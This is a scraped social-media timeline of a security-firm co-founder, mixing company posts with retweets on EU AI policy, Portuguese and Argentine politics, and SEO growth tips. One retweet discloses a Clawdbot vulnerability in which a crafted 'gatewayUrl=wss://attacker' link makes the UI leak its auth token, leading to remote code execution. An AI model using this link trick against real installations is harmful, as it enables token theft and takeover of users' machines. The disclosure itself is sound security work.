Jorge Monteiro

70 posts

@jbmonteiro

entrepreneur, dad, explorer | co-founder @ethiack

Portugal · Joined August 2018
493 Following · 122 Followers
Jorge Monteiro @jbmonteiro
@steipete No, vulns happen always. But vendors shall be responsible for testing their products. In this case we tested it for you. You’re welcome
Peter Steinberger 🦞 @steipete
@jbmonteiro Look at the software industry, you think vulnerabilities only happen in the old ways? If you read the security docs and configure gateway how it’s designed (in your secure network only) this issue doesn’t apply.
Jorge Monteiro retweeted
André Baptista @0xacb
🚨We found RCE in Clawdbot 🚨

If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.

The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian".

Here's how it went down 👇

We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load.

Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏

On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token!

Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems.

Read the deets 👇 ethiack.com/news/blog/one-…
Jorge Monteiro retweeted
Ethiack @ethiack
Hackian just uncovered a high-severity vulnerability and achieved 1-click RCE in @openclaw (previously Clawdbot), fully autonomously, in under 2 hours. We explain how and show you Hackian’s thought process in our latest blog: ethiack.com/news/blog/one-…
Jorge Monteiro retweeted
Ethiack @ethiack
We’ve just analyzed 50,000 assets from European Retail companies. And there are some concerning data points: 16% of connections use invalid or outdated SSL certificates. 17% of web servers expose their version number, easing criminal exploitation. Medium-sized retailers, in the 1000-5000 employee range, have the worst posture. Our new “State of Digital Exposure for European Retail” report uses this data, industry trends, and insights from experts at Nemlig, Carrefour, and others to show what’s to come in Retail. Read the report and find out what you have to do to stop being a statistic. Fully accessible here: ethiack.com/news/blog/digi…
Jorge Monteiro retweeted
Ethiack @ethiack
In the AI era, traditional security scanners are obsolete.  Ethiack CEO and Founder Jorge Monteiro discusses the transition to autonomous technology that mimics the behavior of real hackers 👇
Jorge Monteiro retweeted
Ethiack @ethiack
We’re now detecting the new MongoDB's Memory Exposure Vulnerability. This CVSS 8.7 vulnerability lets unauthenticated attackers read uninitialized heap memory from MongoDB servers, without needing credentials. Affected versions span MongoDB 3.6 through 8.2. If you're running any of these versions, your database is exposed. We’re already detecting this vulnerability across your attack surface, so if you’re unsure you’re exposed, check your dashboard. More info on the CVE here: ethiack.com/news/product/m…
@levelsio
@philipcurryo Give me one example where AI agents actually can do something useful except AI spam replies and AI spam emails for outbound sales?
Jorge Monteiro retweeted
Ethiack @ethiack
This week two massive CVEs affecting React and Next.js were released, with massive repercussions. CVE-2025-55182 and CVE-2025-66478 are critical unauthenticated RCE vulnerabilities affecting even default configurations. After the CVE was announced, we've begun working on a testing module, and we've started testing customers today. If you use React or Next.js, please upgrade to a hardened release immediately.
Jorge Monteiro @jbmonteiro
@levelsio If you are selected with that application, I quit Europe for good
@levelsio
🇪🇺 As a European citizen and AI founder, I can apparently use these "AI Factories", so I just signed up to use them!

Every "supercomputer" has an [ ACCESS NOW ] button which made me very excited

I expected to sign up, maybe pay a discounted H100 rate (funded by EU, that'd be nice?) and get a Jupyter notebook, or some SSH login so I can access my GPU like I'd do on @lambdaapi or @awscloud or @Hetzner_Online

But I celebrated too early, I signed up, confirmed my email, then ended up in a "Supercomputer Access Calls" page, where I had to select from a tedious list of "Call For Proposals" to get access to a GPU

So I could NOT just access a H100 GPU, I have to make sure my project (in this case my business) fits a specific proposal, ok fair

This process was already tedious enough but then when I tried to actually go through with it, it started asking me if I had "Respect for Human Agency?", I do I think, and if I was mindful of "Individual, and Social and Environmental Well-Being?", well I am, right guys??? Right???

The questions didn't stop, just endless pages of this

Look I get what they're doing, they pivoted the classic university "I need to rent a giant computer for my research" to an EU wide thing and then present it as the "European AI plan"

But this isn't really how AI works in production?

As a founder in AI, if I wanna do stuff I'd rent a whole bunch H100 GPUs again at @lambdaapi or @awscloud or @Hetzner_Online and SSH into a box

Or if I want it more simple I run AI models on @FAL, @wavespeed or @replicate which is just an API call or web front end I can click stuff and run a model

The EU has the right intentions here but it's just the wrong execution, this thing will 100% go nowhere, and I'm a born optimist, I want to believe, I'm also a proud European, and I'm in AI a bit and not a complete idiot.

There's just better ways to do this

If you really want to have the GPU servers in Europe (which arguably isn't that important), then let me rent a GPU box with SSH access at @Hetzner_Online or @OVHcloud that's hosted in Europe and subsidize that for European citizens and European businesses. I don't even believe in that, but at least that'd make it accessible for Europeans. Now it really isn't?

What's REALLY much more important though if you want to be a part of the AI race and I've posted for years here with @euaccofficial is to make Europe a really extremely attractive place to start and run an AI business. Remove regulatory obstructions and give tax discounts for startups. Let them build a business first that can compete worldwide and once they make enough money (let's say $100M/y), then slowly start adding regulation. Because right now the regulation only benefits the European incumbents, the dinosaur companies, while making it very difficult for European citizens to start new AI companies here. Which is why we literally have none left.

Anyway, I applied to get my GPU, let's see if I get it!
@levelsio

What in the F is an AI factory?

I had to investigate what the unelected @EU_Commission is talking about today

So according to them, it's some data centers (which they call supercomputers) in 6 different EU countries

I checked out the most powerful one: Karolina, a Czech data center, it mostly has CPUs though (see pic) not GPUs, so mostly useless for AI

The GPUs it does have are 72x 8x NVIDIA A100 GPU, so 576x A100, or equivalent of 240x H100s (H100 is about 2.4x the compute power of A100)

So let's compare that: @xAI has 200,000x H100 GPUs

So the xAI data center has 800x more compute than the Czech one

If we combine xAI, Meta, AWS, etc. it's about 750,000 H100s

If we assume the other 5 data centers in the EU are equivalent to the Czech one (which is massive stretch because most of the others seem AI consultancy services, they don't even HAVE chips!), the EU's new "AI factories" have a total of 1,440x H100 GPUs, let's round up to 1,500 to be nice

So the EU is trying to compete with 750,000 GPUs with their own 1,500 GPUs, so 500x less??

Correct me if I'm wrong but it just seems very low impact and another ridiculous idea and burning of EU tax payers money that will end up in local cronies and bureaucrats and will do NOTHING to improve the AI business climate for Europe

The best way to improve it is to deregulate, make it super easy and low tax (especially when starting out) to start AI companies in Europe

Jorge Monteiro retweeted
Ethiack @ethiack
You’re about to see the world’s first show & tell from a hackbot. Enjoy!
Jorge Monteiro retweeted
Paul Graham @paulg
Elon and Steve Jobs are both famous for pushing people to simplify their designs. I don't think this is a coincidence. Large organizations naturally generate complexity, but if you have a CEO who hates it, this tendency is kept in check.
@levelsio
Immigrants in Portugal are just the scapegoat for a dysfunctional government and corrupt system that doesn't build housing, makes it impossible for Portuguese to start or run businesses This means no jobs created so no job opportunities for them, and no houses built so no places to live for them. Which results in most young Portuguese leaving the country at age 18-25 Before the scapegoat was the digital nomads, and before that the Brazilians. Now it's the South Asian immigrants Portuguese love to blame foreigners for the problems their own government has created Every problem in Portugal is an extreme version of Europe's problems as a whole btw
Alex Doda 🇦🇶 @alexdoda

@levelsio Is Lisbon flooded with islam / asylum seekers rn or kinda normal & it’s just social media algos? I live south of bridge & haven’t been there in a while (although it’s 20 mins away lol). My girl showed some reels - looked just like London - but I couldn’t find anything.

Jorge Monteiro retweeted
Mario Nawfal @MarioNawfal
🚨🇦🇷MILEI’S “CRAZY” PLAN WORKED—ARGENTINA’S PAYCHECKS JUST HIT A 6-YEAR HIGH Private sector wages in Argentina just spiked to their best level since 2018—real wages hit 107 in Feb 2025, up from a sad 91 in late 2023. What changed? Oh, just Milei dropping economic reforms like they were hot. People called it “shock therapy.” Turns out, it was more “money therapy.” Critics yelled, “He’ll crash the economy!” Workers are now yelling, “Payday!” Love him or hate him, Milei’s free-market rollercoaster is actually handing folks fatter checks—for the first time in forever. Source: Observatory of Employment and Business Dynamics, @JMilei, @ArgMilei
Mario Nawfal @MarioNawfal

🚨🇦🇷MILEI PULLS OFF A MONEY MAGIC TRICK—SURPLUS AFTER TAX CUTS Argentina just posted a $440M surplus in March—yes, even after slashing taxes. That includes a solid $825M primary surplus, or 0.1% of GDP. Economy chief Luis Caputo says the whole first quarter ended in the green, with a 0.2% surplus. Not too shabby for a country famous for economic chaos. Milei’s crew cut export taxes and ditched the controversial “Impuesto PAIS,” but somehow didn’t blow the budget. Next year’s goal? Even bigger: 1.6% primary surplus. Turns out Milei’s weapon of choice is... spending less. And right now? It’s working. Source: @LuisCaputoAR, @JMilei, @argmilei

Jorge Monteiro @jbmonteiro
The ball doesn't have to go to the people; the people come to the ball
Portimão, Portugal 🇵🇹
John Rush @johnrushx
SEO is simple but not easy. 4 months ago, I quietly launched llmmodels.org. It took a while but started growing and really took off a week ago. Here is my process: 1. Domain name - matches a keyword with high traffic and low competition (only .com/.org/.ai). 2. Website runs on SEO-optimized CMS (I run them on Unicorn Platform). 3. Domain Rating must be > 10. Earn 100+ backlinks. (I used ListingBott). 4. Scrape or manually curate the directory items. This one is really important. The quality of items must be high. 5. Launch on PH, IH, HN, DevTo, Reddit, X, LD (for clicks and for backlinks for SEO). 6. Run SeoBotAI for blog articles. Wait for a month. Find top articles and manually improve them to make them even better. 7. Run an indexing tool to get pages indexed by google faster ( I used my own IndexRusher . com) 8. See top keywords driving traffic to each page and place those keywords into meta title/description/h1. Do it for top 10 pages every month. 9. Keep updating the database with fresh items. 10. Make more directories to interlink them all and grow even better with SEO. -- I'm working on a "Directory Incubator" program launching in early Sept. - 4 weeks - paid - best directory will get my sponsorship for a year I'll pick about 50 people for the first batch—maybe less. Reply to this post and I'll DM you application form once it's live.
John Rush @johnrushx
I'm launching a Directory BuilderVerse. - the builder & templates for jobboards, lists, launchpads, courses, info sites, help desks, blogs, programmatic SEO. Every SaaS maker should have few directories to channel traffic, passive income & backlinks. But here is the coolest part: 1. I'll also launch an incubator, "Directory as a side project," thing to help others launch directories and grow them using SEO, viral marketing, collabs, etc. (90-day batches). 2. The best directory of the batch will win prizes(money, fame and coupons for my tools) I'm working out the details by running a small batch already and learning by doing. 3. The program will be paid(small sum, to make sure I filter out those who aren't serious about the thing). >>> Join the waitlist by replying.
Jorge Monteiro @jbmonteiro
If you are in SaaS in 2024, and you are not investing in cybersecurity you are irresponsible Doing technology without testing is careless. You are putting yourself and your customers in danger. Change my mind.